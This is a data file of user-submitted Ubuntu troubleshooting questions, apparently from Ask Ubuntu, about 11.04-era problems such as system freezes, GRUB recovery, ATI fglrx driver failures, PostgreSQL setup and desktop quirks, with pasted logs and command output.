41941	machine freezes after a period of inactivity	my machine freezes after an extended period of inactivity . i recently upgraded from ubuntu 10.10 to 11.04 . this is when the problem started . when i try to access my sleeping machine , i can see the mouse moving on the screen ( because i 'm moving it ) but i ca n't get the screen saver to go away . the only way i have been able access it after it 's been idle is to power off and back on by holding down the power button . i have posted my cpu info below . if someone could help me out i would really appreciate it . processor : 0 vendor_id : genuineintel cpu family : 6 model : 23 model name : intel ( r ) core ( tm ) 2 duo cpu t6400 @ 2.00ghz stepping : 10 cpu mhz : 1200.000 cache size : 2048 kb physical id : 0 siblings : 2 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good nopl aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm sse4_1 xsave lahf_lm dts bogomips : 3990.37 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management : processor : 1 vendor_id : genuineintel cpu family : 6 model : 23 model name : intel ( r ) core ( tm ) 2 duo cpu t6400 @ 2.00ghz stepping : 10 cpu mhz : 1200.000 cache size : 2048 kb physical id : 0 siblings : 2 core id : 1 cpu cores : 2 apicid : 1 initial apicid : 1 fpu : yes fpu_exception : yes cpuid level : 13 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good nopl aperfmperf pni dtes64 monitor ds_cpl est tm2 ssse3 cx16 xtpr pdcm sse4_1 xsave lahf_lm dts bogomips : 3989.98 clflush size : 64 cache_alignment : 64 address sizes : 36 bits physical , 48 bits virtual power management :
41946	sound increasing and decreasing randomly in xmoto	i have installed the wonderful xmoto game in my ubuntu 11.04 ( 2.6.38-8-generic ) and when i start the game my sound control became crazy . the sounds decreases and increases randomly . if i close the game this strange behavior still continues . well , i think this is n't a problem with ubuntu , gnome , kde at all because in my older installations ( ubuntu 10.04 and 10.10 ) the same thing happen . but i do n't know how to solve it . my audio device is ( lspci | grep audio ) : 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) my sounds is ok for other things , i can hear several things at the same time , etc . so , anyone knows how to solve this problem ?
41951	why does the status availability icon get stuck with three dots when logging in ?	i 've been noticing lately that the chat bubble icon next to my username gets stuck with a bubble with three dots in it when i log into ubuntu . the only way for me to resolve it is to set my status to `` away '' or `` busy '' and then go back to available . does anyone have an idea why this happens or a way to resolve it ? here 's a screenshot :
41952	other linux distros deleting ubuntu from grub	ok , so i installed fedora on a dual boot windows 7 and ubuntu machine to see which distro i liked better , and now ubuntu does n't appear in the grub menu . in fact , windows does n't either . there are only two items , fedora and other ( which boots windows ) how do i get grub to recognize all installed operating systems ?
41953	can not make google chrome default browser	i installed chromium . it worked well . but i could not set it as default . it was there in my dash , but every time i opened it , it asked me whether i want to set it as default . i even tried changing it in the preferences . i could click on make it my default browser but it did n't make a change . so i installed chrome beta . it worked well initially . following a last update ( 12.0.742.30 beta ) this problem has started again . is this is a bug ? or is it just me ? and how can i make chrome remember my preference ? ( p.s . i do n't want to switch to the stable channel . ) [ update : i found a workaround that i select 'do not ask me again ' when it asks me for my preference . this stops the annoying messages , and since chrome is the only browser on my natty currently it is default in any case . but this restricts me from installing any other browser . ]
41954	how to make vidalia work with tor and privoxy ?	i installed vidalia and privoxy . when i start vidalia , i get connected to the tor network . but my ip address wont change with both browsers opera and chrome . my settings in proxy are set to local host 8118 . this used to work , but now the ip address wont change . any ideas ?
41957	how to run a function as root in shell script	exactly i want to make a script and add this to shortcut launcher ... when i double click the icon , it will popup a terminal window ( done ) in terminal , it will ask root password at first.. and then do some stuff with root privilege ( i make it as a function ) .. after that , in the end of script it will close the window like `` press anykey to close window '' ( i can do it ) # ! /bin/sh touchpad ( ) { whoami } sudo -s touchpad # but it return error `` command not found '' how to run a function as root user ? or there is another way to do this ? edit : i'v try this # ! /bin/bash sudo ./main2.sh # this not work when i make it as a launcher exit this is my current code ( after googling ) : # ! /bin/bash gksudo -m `` input password '' clear sudo whoami # sudo bla bla bla read -n 1 -p `` press any key to close window '' this is what i want , but got error if i type wrong password for 3 times.. how to force quit main window if gksudo fail ? ?
41962	what to do when unity 's launcher gets stuck open ?	my unity launcher is currently stuck open . short of logging out and back in , does anyone have ideas for getting it to auto-hide as usual ?
41964	how to help improve banshee ?	i have had some problems running banshee . it crashes quite often after finishing playing a song . it also jumps all over the place when playing back albums - sometimes it plays the first song twice - other times it jumps from the first song to the fourth . how can i help pinpoint the cause of these problems ? what would i need to do to be able to at least provide crash report information ? i would love to help make the application better in whatever way i can .
41965	which package provides gnome 's config utility ?	as per is there a way to save a session ? , i 'd like to configure gnome to automatically save my session in 11.04 . however , when i type config into a terminal , i get a command not found . which package provides the gnome config editor that is described in the answer to the above question ?
41967	chrome set system wide proxy	when i set up a socket proxy in chrome and click the `` apply system wide '' button . does that mean that every software that connects to the internet is going to use that proxy , including chats and others ? kind regards
41970	what floss skype alternatives are available ?	given skype 's slow development speed for the gnu/linux version and its recent acquisition by microsoft , i am looking for alternative softwares . what floss ( free/libre/open-source software ) skype alternatives are available ?
41971	getting the command for an application	if i did n't know the command for a specific application , it used to be possible to create a desktop shortcut , then look at the properties . this was handy , for example , if i wanted to add a programme to the `` startup applications '' list . with unity , that option is gone , and i have to log out and log bank in with the `` classsic '' desktop to repeat the procedure . presumably i wo n't be able to do even that after 10.10 , so is there a better way ?
41981	krusader - how to go to file ?	i have many files in directory and i would like to the focus to be transported to files with name staring with `` ble '' , how to do it ? in totalcmd you would hold alt and type `` ble ''
41984	how do i stop the 'free the fish ' easter egg ?	i did 'apt-get install free the fish ' to see what the ubuntu 'wanda the fish ' easter egg looks like . i have now had enough of the fish and want it to stop , which i could do by logging in and out . unfortunately i have a few other things open right now and i do n't want to do that . i tried ps -ef | more to see if i could identify the process , but i could not . also the google came up with no answers . anyone have any ideas ?
41989	do we have a simulation software for switching and routing practice ?	is there a simulation software for switching and routing ?
41993	how to disable mod4+s ?	i 've installed a fresh 11.04 . then i 've configured it to use xmonad . in xmonad i 'm using mod4+s to move through workspaces , but in new ubuntu gnome-panel catches this shortcut earlier and shows me up with menu ( same you see when pressing power button in the most right position in gnome panel ) . so the subj is : how to disable mod4+s in fresh ubuntu 11.04 ? i 've tried to scan with gconf for mod4 and super keys but found only compiz bindings ( removing does n't help ) . if i will configure mod4+s for something in 'keyboard shortcuts ' it works , but after disabling it again shows me menu .
41995	one ip address , two websites , on two machines	i want to setup multiple ( currently two ) websites hosted on two different machines , using one external ip address . each of these websites will be on different sub-domains or domains . is there a way i could leverage ubuntu server to ask as my entry point into my network ( after my firewall ) to direct traffic the the appropriate machine based on host header of some of means ? i 've done this in the past with microsoft proxy server/isa . microsoft called this feature `` reverse-proxy '' . thanks so much for your help matt
42006	how do i select one window without opening others ?	unity comes with so much changes . some features are good but i am getting problem with multiple windows management . when i used to open multiple windows and click on icon to show one of them then all the open windows comes up . right-click does not work like docky to select one window . it is just disturbing . suppose i am working on firefox and need one of the opened file browsers . when click all nautilus comes-up . what is the method to select one of the window without open others . i am doing wrong or unity do not have any good management system . please help .
42007	change default .png for saving .jpeg image	i once read about this possibility , including controlling the size of resolution , unfortunately , did not save the link and i 'm trying without much success .
42010	hibernate with uswsusp not working from system menu	i can hibernate with s2disk , so this seems to be set up correctly . in /etc/pm/config.d/00_sleep-module , i have the line sleep_module= '' uswsusp '' , which should make the system use uswsusp for hibernation . however , if i choose ‘ruhezustand’ from the system menu ( that’s hibernation in a german locale ) , it just does not work . i even see the warning about the missing splash system ( which i always ignored ) . when called by hand , this is followed by the textual progress meter , but when called from the menu , that’s where it stucks . i can not even imagine how to debug that . it used to work before i upgraded to 11.04 , so it is connected to the update somehow . addendum : running pm-hibernate as root works running sudo s2disk works however , sudo pm-hibernate fails now this is weird . something in my environment makes pm-hibernate fail ?
42013	problem installing and configuring postgresql	i am a newbie here and to the server administration . a couple of days back i have registered a server with hetzner with ubuntu 11.04 . i intend to work with postgresql , for which i have installed from source after failing to install using apt-get . the installation as such does n't fail , but the postgresql service does n't start automatically or when i try to start it manually . it fails with the following error message when i try to do anything with it : manager @ ubuntu-1104-natty-32-minimal : ~ $ sudo su postgres -c psql template1 psql : could not connect to server : no such file or directory is the server running locally and accepting connections on unix domain socket `` /var/run/postgresql/.s.pgsql.5432 '' ? this was the error i was getting when i had installed postgresql using apt-get and i re-installed it from source . the following is the output i got when i installed it from source . this confirms that the postgresql is indeed installed . make -c config install make [ 1 ] : entering directory `/home/manager/postgresql-9.0.4/config' /bin/mkdir -p '/usr/local/pgsql/lib/pgxs/config' /bin/sh ../config/install-sh -c -m 755 ./install-sh '/usr/local/pgsql/lib/pgxs/config/install-sh' make [ 1 ] : leaving directory `/home/manager/postgresql-9.0.4/config' postgresql installation complete . but , does n't the service starts automatically ? it does n't here : manager @ ubuntu-1104-natty-32-minimal : ~ $ ps auxw | grep post manager 6734 0.0 0.0 4156 868 pts/0 s+ 14:10 0:00 grep -- color=auto post this is taking a toll on my patience and confidence . please help me solve this problem .
42014	how do i search in zips or jars ?	i want to search for some file ( class ) in zips ( jars ) . how to do it from command line ?
42018	trying to build gedit	i 'm very new to ubuntu , just installed 10.04 when my girlfriend 's macbook pro ( 32 bit v1,1 ) could n't keep up with osx any more . i thought it 'd be a perfect opportunity to learn how to linux . i 've got to admit that so far i 'm really loving it ( ca n't believe i 've waited so long ! ) anyways , i 've tried doing a bit of programming on it locally but vi in a terminal window can only get me so far ( sorry to the old pros , but there 's just some stuff i like gui for ) . i 've been looking through the options for a good text editor and have seen that gedit and geanie both have screenshots that look like the kind of thing i 'd like to try ( and eclipse , but that means installing java.. one step at a time ) . last night i tried to install gedit and got as far as running ./configure on trying to compile it gave me a laundry list of missing libraries ( including but possibly not limited to ) gtk+3.0 libgio .. ( a bunch of others ) i do n't have all the requirements on hand as i am posting from a different computer ( the ubuntu is at home ) . if it 's useful , i 'll run the configure and copy-paste the list . so far i 've been able to find a few of the commands i need like apt-get install and searching for package names via apt-cache search the problem that i 'm having is that none of these cli options seem to really match up well with the package names that gedit is looking for . for example , i can type apt-get install gtk+3.0 which gives no package found or try apt-cache search gtk and get a list of some 100 packages with gtk in the title . similarly - searching for libgio returns an option of libgio-2.0-fam but this is apparently not the package required by gedit . so down to the bottom line of my actual question ( i guess ) . what are some reliable strategies i can use to find the package name ( the one i type in to install ) that is associated with the package name that the application is expecting ?
42024	after using ubuntu installer for windows , the monitor button enters a p	i ran the ubuntu installer for windows ( wubi ) and now my fn+f4 button does not work in windows anymore . this is the button that is usually the monitor switcher ( primary , secondary , mirror ) . this now just types the letter p after a sub-second delay while i 'm booted into windows . is there any way to resolve this ? ( without removing ubuntu ) . here are all my function buttons fn+f1 ( windows help ) : this does not work . flag+f1 works but i do n't care anyway . fn+f2 ( print ) : this still works , same as ctrl+p fn+f3 ( internet ) : this still works . fn+f4 ( monitor ) : this is the one that i use most but just types the letter p after a very short delay fn+f5 ( sleep ) : this still works . fn+f6 ( lock ) : this does not work . but i always use flag+l anyway so i do n't care . fn+f7 ( brighten screen ) : this still works . fn+f8 ( darken screen ) : this still works . fn+f9 ( play/pause ) : have not tried . fn+f10 ( stop ) : have not tried . fn+f11 ( next track ) : have not tried . fn+f12 ( previous track ) : have not tried .
42026	i am looking for an easy to use graphical data recovery program	i am looking for a easy to use , easy to install , data recovery application ( like recuva ) i have tried test disk and have n't figured out how to it . so my question is . does anyone know of a easy to use ( including easy to install ) data recovery application for ubuntu .
42027	can not insert backslash with bash , python , works fine with csh , idle	i have a strange problem with inserting backslashes ( ubuntu 10.10 and 11.04 , the upgrade changed nothing ) . the key combination on my keyboard ( swedish thinkpad t400 ) is altgr + ? . however , this seems not to be the problem , as it only appears with some programs . with for instance bash 4.2 , python 2.7 , python 3.2 , swipl 5.10 i can not type nor copy-paste backslash into the terminal . with ash , csh , ghci , nano , vi , idle , idle3 everything behaves as expected , i can both type and copy-paste . for instance , copying echo gurka\\\\agurk ( four literal backslashes ) and pasting it into csh ( and then hitting enter ) , i get $ csh % echo gurka\\\\agurk gurka\\agurk but with bash , i get $ echo gurkaagurk gurkaagurk unfortunately , i noticed first quite a while after many new installations and i ca n't tell when it first appeared . i suspect a bug or conflicting configuration of some library common to the first group but not to the second , but i am unsure on how to go on . it is extremely annoying and i am grateful for hints . update : the behaviour is the same for konsole and whatever you get with ctrl-alt-f1 ( which is what i had tested ) . it also does not work with gnome-terminal and xterm , but these two indicate error ( by flashing ) . ideas about what to check ? update : problem is solved , thanks to gilles ! it was a misconfiguration of the readline library ( .inputrc ) marcus
42032	shutdown logs out instead of shutting down	many times ( not all the time ) when i want to shutdown or restart , the computer does not shutdown but goes to the screen for changing the user . i am the only user of my computer . so i had to shutdown a second time . is there a solution for this ?
42036	publishing shotwell albums to flickr / picasa	i 'd like to ask two questions relating to shotwell if i may . firstly : how do i alter the meta-data of the pics imported to shotwell ? i have some showing up as having been taken in 2095 and so on . secondly , i 'd like to upload my pictures to either flickr / picasa . ideally i 'd like to manage all the pics from shotwell and just sync with the web service as pics are added , changed etc . which , if either , service would let me do this ?
42039	how do you recover from formating your partition with grub ?	i had my laptop 's hdd separated in 3 partitions : ntfs - win xp install ( primary ) ntfs - common space ( extended ) ext4 - ubuntu 10.10 ( extended ) running out of space , i deleted my 2nd partition , and formated it to ext4 , planning to merge it to my 3rd partition . the problem is that after restart i realized that grub was installed on partition # 2 . using grub ( gnu grub 0.97 ) an ubuntu 11.04 live cd , i tried : grub > root ( hd0,4 ) grub > setup ( hd0,4 ) checking if `` /boot/grub/stage1 '' exists ... no checking if `` /grub/stage1 '' exists ... no error 15 : file not found grub > also , for setup ( hd0 ) i get the same result . right now i have : /dev/sda1 aka ( hd0,0 ) - win xp ( ntfs ) /dev/sda7 aka ( hd0,6 ) - the free space ( ext4 ) /dev/sda5 aka ( hd0,4 ) - my previous install of ubuntu ( ext4 ) how can i repair it ?
42041	boot cd wo n't boot with a `` x86-64 cpu , but only detected an i686 cpu '' error	the error message is this kernel requires an x86-64 cpu , but only detected an i686 cpu . unable to boot - please use a kernel appropriate for your cpu . how can i overcome this ?
42045	where can i find the irc logs from the channels used during uds-o ?	i want to review some irc discussions that happened during uds-o , but i ca n't find the irc logs as they are n't in the usual place http : //irclogs.ubuntu.com . where can i find those logs ?
42048	window switcher over all workspaces/desktops in gnome	i 'm aware of 3 solutions : use compiz 's ring switcher http : //code.google.com/p/superswitcher/ change desktop manager to kde or xfce but i 'm not satisfied with theses solutions . is there any other solution out there ?
42055	strange display glitch in the gnome panel	my gnome panel behaves strane , it just displays random parts of the background image and sometimes just lacks some icons : how can i fix this ?
42056	why is conky on top of windows only on boot ?	i recently changed my conky config so that when i 'show desktop ' super+d , conky does n't also minimize . so i changed own_window_type normal to own_window_type override this worked fine except when i boot ubuntu it starts up with conky on top of all windows . i have to kill and restart conky for it to display properly .
42058	after upgrade from 10.10 to 11.04 ubuntu does n't load the splash screen anymore	i have the problem that ubuntu does n't load the splash screen anymore ( after upgrading from 10.10 to 11.04 ) . after the grub-bootloader , it takes a few seconds to load and then the monitor turns black . i already tried to boot from a ubuntu live cd , but the result was the same error . furthermore i tried to start the protected mode , but it freezes just after showing me menu . do you have any solutions for this ? and is it possible to switch from grub to the ubuntu console ?
42059	installation of amd proprietary fglrx graphics driver fails	installation of amd proprietary fglrx graphics driver fails on 11.04 which was upgraded from 10.10 sudo apt-get install fglrx fglrx-amdcccle reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : libknewstuff2-4 libqt4-test kdesudo libqt4-help python-qt4 python-sip libvncserver0 libqtassistantclient4 update-manager-kde libqt4-scripttools python-kde4 use 'apt-get autoremove ' to remove them . the following new packages will be installed : fglrx fglrx-amdcccle 0 upgraded , 2 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/40,3 mb of archives . after this operation , 124 mb of additional disk space will be used . dpkg : warning : parsing file '/var/lib/dpkg/status ' near line 56859 package 'virtualbox-2.2 ' : error in version string '2.2.4-47978_ubuntu_jaunty ' : invalid character in revision number dpkg : warning : parsing file '/var/lib/dpkg/status ' near line 56860 package 'virtualbox-2.2 ' : error in config-version string '2.2.4-47978_ubuntu_jaunty ' : invalid character in revision number dpkg : warning : parsing file '/var/lib/dpkg/available ' near line 59749 package 'virtualbox-2.2 ' : error in version string '2.2.4-47978_ubuntu_jaunty ' : invalid character in revision number ( reading database ... 511988 files and directories currently installed . ) unpacking fglrx ( from ... /fglrx_2 % 3a8.840-0ubuntu4_amd64.deb ) ... dpkg-divert : warning : parsing file '/var/lib/dpkg/status ' near line 56859 package 'virtualbox-2.2 ' : error in version string '2.2.4-47978_ubuntu_jaunty ' : invalid character in revision number dpkg-divert : warning : parsing file '/var/lib/dpkg/status ' near line 56860 package 'virtualbox-2.2 ' : error in config-version string '2.2.4-47978_ubuntu_jaunty ' : invalid character in revision number dpkg-divert : warning : parsing file '/var/lib/dpkg/status ' near line 56859 package 'virtualbox-2.2 ' : error in version string '2.2.4-47978_ubuntu_jaunty ' : invalid character in revision number dpkg-divert : warning : parsing file '/var/lib/dpkg/status ' near line 56860 package 'virtualbox-2.2 ' : error in config-version string '2.2.4-47978_ubuntu_jaunty ' : invalid character in revision number dpkg-divert : warning : parsing file '/var/lib/dpkg/status ' near line 56859 package 'virtualbox-2.2 ' : error in version string '2.2.4-47978_ubuntu_jaunty ' : invalid character in revision number dpkg-divert : warning : parsing file '/var/lib/dpkg/status ' near line 56860 package 'virtualbox-2.2 ' : error in config-version string '2.2.4-47978_ubuntu_jaunty ' : invalid character in revision number dpkg-divert : warning : parsing file '/var/lib/dpkg/status ' near line 56859 package 'virtualbox-2.2 ' : error in version string '2.2.4-47978_ubuntu_jaunty ' : invalid character in revision number dpkg-divert : warning : parsing file '/var/lib/dpkg/status ' near line 56860 package 'virtualbox-2.2 ' : error in config-version string '2.2.4-47978_ubuntu_jaunty ' : invalid character in revision number dpkg-divert : warning : parsing file '/var/lib/dpkg/status ' near line 56859 package 'virtualbox-2.2 ' : error in version string '2.2.4-47978_ubuntu_jaunty ' : invalid character in revision number dpkg-divert : warning : parsing file '/var/lib/dpkg/status ' near line 56860 package 'virtualbox-2.2 ' : error in config-version string '2.2.4-47978_ubuntu_jaunty ' : invalid character in revision number dpkg-divert : warning : parsing file '/var/lib/dpkg/status ' near line 56859 package 'virtualbox-2.2 ' : error in version string '2.2.4-47978_ubuntu_jaunty ' : invalid character in revision number dpkg-divert : warning : parsing file '/var/lib/dpkg/status ' near line 56860 package 'virtualbox-2.2 ' : error in config-version string '2.2.4-47978_ubuntu_jaunty ' : invalid character in revision number dpkg-divert : warning : parsing file '/var/lib/dpkg/status ' near line 56859 package 'virtualbox-2.2 ' : error in version string '2.2.4-47978_ubuntu_jaunty ' : invalid character in revision number dpkg-divert : warning : parsing file '/var/lib/dpkg/status ' near line 56860 package 'virtualbox-2.2 ' : error in config-version string '2.2.4-47978_ubuntu_jaunty ' : invalid character in revision number dpkg-divert : warning : parsing file '/var/lib/dpkg/status ' near line 56859 package 'virtualbox-2.2 ' : error in version string '2.2.4-47978_ubuntu_jaunty ' : invalid character in revision number dpkg-divert : warning : parsing file '/var/lib/dpkg/status ' near line 56860 package 'virtualbox-2.2 ' : error in config-version string '2.2.4-47978_ubuntu_jaunty ' : invalid character in revision number dpkg-divert : warning : parsing file '/var/lib/dpkg/status ' near line 56859 package 'virtualbox-2.2 ' : error in version string '2.2.4-47978_ubuntu_jaunty ' : invalid character in revision number dpkg-divert : warning : parsing file '/var/lib/dpkg/status ' near line 56860 package 'virtualbox-2.2 ' : error in config-version string '2.2.4-47978_ubuntu_jaunty ' : invalid character in revision number [ warning ] uninstall : inst_path_default or inst_path_override does not exist in /etc/ati . this suggests that the ati driver is not installed , the ati driver is only partially installed , or the current ati driver installed is an older version than the one this script was designed for . both files listed above are required for determining where installed files are located . to force uninstallation of the driver by guessing where the uninstallation files are located , set the force_ati_uninstall environment variable and re-run /usr/share/ati/fglrx-uninstall.sh ( this is not recommended ) . dpkg : error processing /var/cache/apt/archives/fglrx_2 % 3a8.840-0ubuntu4_amd64.deb ( -- unpack ) : subprocess new pre-installation script returned error exit status 1 selecting previously deselected package fglrx-amdcccle . unpacking fglrx-amdcccle ( from ... /fglrx-amdcccle_2 % 3a8.840-0ubuntu4_amd64.deb ) ... errors were encountered while processing : /var/cache/apt/archives/fglrx_2 % 3a8.840-0ubuntu4_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 )
42060	help me interpret my dmiencode results to figure out what kind of ram slots i have	my motherboard has four dimm slots for ram ( labeled xmm1 , xmm2 , xmm3 , and xmm4 ) . they look identical ( one notch near the middle ) except 1 & 3 are black plastic , 2 & 4 are white . i have only one dimm in right now , in slot 1 . i 'd assume they 're all the same , but my dmiencode output seems to indicate that 1 is ddr2 , while the rest are just regular ddr ? dmiencode -- type 17 output : # dmidecode 2.9 smbios 2.3 present . handle 0x0035 , dmi type 17 , 27 bytes memory device array handle : 0x0033 error information handle : not provided total width : 64 bits data width : 64 bits size : 1024 mb form factor : dimm set : none locator : xmm1 bank locator : not specified type : ddr2 type detail : synchronous speed : 400 mhz ( 2.5 ns ) manufacturer : jedec id : c1 00 00 00 00 00 00 00 serial number : 23211205 asset tag : not specified part number : 64t128020hu5a handle 0x0036 , dmi type 17 , 27 bytes memory device array handle : 0x0033 error information handle : not provided total width : unknown data width : unknown size : no module installed form factor : dimm set : none locator : xmm2 bank locator : not specified type : ddr type detail : synchronous speed : unknown manufacturer : jedec id : serial number : asset tag : not specified part number : handle 0x0037 , dmi type 17 , 27 bytes memory device array handle : 0x0033 error information handle : not provided total width : unknown data width : unknown size : no module installed form factor : dimm set : none locator : xmm3 bank locator : not specified type : ddr # # # # # # # # not ddr2 ? type detail : synchronous speed : unknown manufacturer : jedec id : serial number : asset tag : not specified part number : handle 0x0038 , dmi type 17 , 27 bytes memory device array handle : 0x0033 error information handle : not provided total width : unknown data width : unknown size : no module installed form factor : dimm set : none locator : xmm4 bank locator : not specified type : ddr type detail : synchronous speed : unknown manufacturer : jedec id : serial number : asset tag : not specified part number : i need to buy new ram as the current ram is probably wrong ( found it lying around ) . what type of ram does my motherboard take ? once i figure out what type it is i 'm just going to buy the max speed even though i 'm sure it 's a slower mobo .
42063	shotwell refusing to publish more than one photo at a time	i 'm using shotwell 0.9.2 on ubuntu 11.04 . if i select 5 photos , click publish , and then publish again i get a message saying : uploading 1 of 5 however , once the progress bar gets to the end it still reads `` 1 of 5 '' and the operation completes at that point , saying : the selected photos were successfully published . but only the first one in my selection is ever published ! this seems like a rather obvious bug to have been missed . does anyone have any information or a workaround for this ? could n't find anything obvious with google .
42065	`` file sync error . '' with ubuntu one	i can not sync my documents to ubuntu one . i get this message file sync error . ( auth failed ( auth_failed ) ) when i click on ubuntu one from preferences . i have tried clearing the ubuntu one entries in password and encryption keys but that does n't seem to be the problem . i am using ubuntu 11.04 and am fairly new to linux .
42070	how to i get suspend/hibernate working with my proprietary nvidia driver ?	i 'm using a sony vaio z . ( vpcz122gx to be precise ) i have to use a modded kernel to boot and then reboot into the new kernel in order to get accelerated graphics . this is due to the nature of the hardware graphics chip switcher . i 've got the nvidia graphics working fine , except for suspend/hibernate . when i suspend it goes to sleep , however , when i open the lid and press the power button , the light comes back on , but i have nothing on my screen . its just black . i ca n't even enter tty1 . i 'd appreciate any possible solutions to my problem .
42074	how to disable alternative international keyboard	during installation i selected the alternative international keyboard . the problem with this keyboard that a double-quote character does n't get typed until a space is pressed . same for tilde ( ~ ) and single quote ( ' ) . i can not get this keyboard removed . i tried to click on my keyboard applet , selecting keyboard preferences , removing the alternative keyboard . but every time i restart , the alternative keyboard is back again . how can this be removed ?
42077	enabling system-wide dynamic range compression	i need to enable dynamic range compression system wide . i 've tried looking around some but could n't find anything precise on how to set it up . the target system is running ubuntu karmic , but instructions for lucid would be helpful as well if there 's any difference . command line steps would be preferred as i 'd need to automate the process to run on many machines , which do not all share similar hardware . they 're currently using pulseaudio .
42080	mobile 3g connection	hello i 'm a newbie ubuntu user , i have a mobile 3g modem ( vodafone vodem ) , i found my modem 's drivers in this site . i installed it and now i can connect via my 3g modem very well . but while i was use windows , there was an application ( i mean , vodafone 's official modem application , vodafone connect ) for my modem . with this application i could send / get sms , check my bandwidth quota etc . are there any application for linux , like that application ? how can i control my bandwidth quota usage ? how can i send / get sms thank you .
42086	unity messed up by fglrx drivers	i tried to install the ati propreitary driver from this link ... here but somehow at the end it gave me some error.. and when i rebooted , unity complained that my h/w cant run unity.. and since then only the classic interface is available ... can anybody tell me how to uninstall the fglrx drivers ? there is nowhere written how to uninstall the drivers or what to do if the process aborts due to an error.. i am also so much frustrated with ati.. in 5 years amd got up with this driver which is of no use..as the installation process is suitable for people that know how to hack a kernel ! .. and absolutly not for intermediate users . any way to revert.. i dont want to do a clean install all over again.. or can i repair by reinstalling again.. ( not reformatting ) ? update : this is the update process output and errors that i get.. i have ati mobility radeon x700 graphics.. do you agree with the license ? [ y/n ] y do you want to proceed with recommended installation ? [ y/n ] y preprocessing documentation installing documentation ... 100 % - //usr/share/doc/ati/ati_license.txt copying uninstall files for documentation preprocessing display and opengl drivers installing display and opengl drivers ... 100 % - //usr/share/doc/ati/articles/4485.html 100 % - //usr/share/doc/ati/configure.html 100 % - //usr/share/doc/ati/linuxfaq.html 100 % - //usr/lib/xorg/modules/linux/libfglrxdrm.so 100 % - //usr/lib/xorg/modules/drivers/fglrx_drv.so 100 % - //usr/lib/xorg/modules/glesx.so 100 % - //usr/lib/xorg/modules/amdxmm.so 100 % - //usr/lib/libamdxvba.cap 100 % - //usr/lib/libamdxvba.so.1.0 100 % - //usr/lib/libxvbaw.so.1.0 100 % - //usr/lib/libatiadlxx.so 100 % - //usr/lib/libaticalcl.so 100 % - //usr/lib/libaticaldd.so 100 % - //usr/lib/libaticalrt.so 100 % - //usr/lib/libatiuki.so.1.0 100 % - //usr/lib/libfglrx_dm.so.1.0 100 % - //usr/lib/fglrx/fglrx-libgl.so.1.2 100 % - //usr/lib/dri/fglrx_dri.so 100 % - //usr/lib/xorg/modules/extensions/fglrx/fglrx-libglx.so 100 % - //usr/include/gl/glati.h 100 % - //usr/include/ati/gl/glx.h 100 % - //usr/include/ati/gl/glxext.h 100 % - //usr/bin/fgl_glxgears 100 % - //usr/bin/fglrxinfo 100 % - //usr/bin/aticonfig 100 % - //usr/bin/atiodcli 100 % - //usr/bin/atiode 100 % - //usr/src/ati/fglrx_sample_source.tgz 100 % - //usr/sbin/amdnotifyui 100 % - //usr/sbin/atieventsd 100 % - //etc/ati/amdpcsdb.default 100 % - //etc/ati/atiogl.xml 100 % - //etc/ati/control 100 % - //etc/ati/logo.xbm.example 100 % - //etc/ati/logo_mask.xbm.example postprocessing display and opengl drivers copying uninstall files for display and opengl drivers preprocessing kernel module installing kernel module ... 100 % - //lib/modules/fglrx/build_mod/kcl_acpi.c 100 % - //lib/modules/fglrx/build_mod/drm_proc.h 100 % - //lib/modules/fglrx/build_mod/kcl_agp.c 100 % - //lib/modules/fglrx/build_mod/drmp.h 100 % - //lib/modules/fglrx/build_mod/firegl_public.h 100 % - //lib/modules/fglrx/build_mod/firegl_public.c 100 % - //lib/modules/fglrx/build_mod/drm.h 100 % - //lib/modules/fglrx/build_mod/make.sh 100 % - //lib/modules/fglrx/build_mod/libfglrx_ip.a 100 % - //lib/modules/fglrx/build_mod/kcl_pci.c 100 % - //lib/modules/fglrx/make_install.sh postprocessing kernel module copying uninstall files for kernel module preprocessing catalyst control center installing catalyst control center ... 100 % - //usr/share/icons/ccc_large.xpm 100 % - //usr/share/ati/amdcccle/amdcccle_cs.qm 100 % - //usr/share/ati/amdcccle/amdcccle_da_dk.qm 100 % - //usr/share/ati/amdcccle/amdcccle_de.qm 100 % - //usr/share/ati/amdcccle/amdcccle_el_gr.qm 100 % - //usr/share/ati/amdcccle/amdcccle_es_es.qm 100 % - //usr/share/ati/amdcccle/amdcccle_fi_fi.qm 100 % - //usr/share/ati/amdcccle/amdcccle_fr_fr.qm 100 % - //usr/share/ati/amdcccle/amdcccle_hu_hu.qm 100 % - //usr/share/ati/amdcccle/amdcccle_it_it.qm 100 % - //usr/share/ati/amdcccle/amdcccle_ja.qm 100 % - //usr/share/ati/amdcccle/amdcccle_ko_kr.qm 100 % - //usr/share/ati/amdcccle/amdcccle_nl_nl.qm 100 % - //usr/share/ati/amdcccle/amdcccle_no.qm 100 % - //usr/share/ati/amdcccle/amdcccle_pl.qm 100 % - //usr/share/ati/amdcccle/amdcccle_pt_br.qm 100 % - //usr/share/ati/amdcccle/amdcccle_ru_ru.qm 100 % - //usr/share/ati/amdcccle/amdcccle_sv_se.qm 100 % - //usr/share/ati/amdcccle/amdcccle_th.qm 100 % - //usr/share/ati/amdcccle/amdcccle_tr_tr.qm 100 % - //usr/share/ati/amdcccle/amdcccle_zh_cn.qm 100 % - //usr/share/ati/amdcccle/amdcccle_zh_tw.qm 100 % - //usr/bin/amdcccle 100 % - //usr/bin/amdxdg-su 100 % - //usr/bin/amdupdaterandrconfig 100 % - //usr/share/doc/ati/ccc_copyrights.txt 100 % - //usr/share/ati/lib/libqtcore.so.4 100 % - //usr/share/ati/lib/libqtgui.so.4 postprocessing catalyst control center copying uninstall files for catalyst control center 100 % - //usr/share/ati/ati_license.txt installation complete . there were errors during installation . details can be found in /usr/share/ati/fglrx-install.log [ press enter 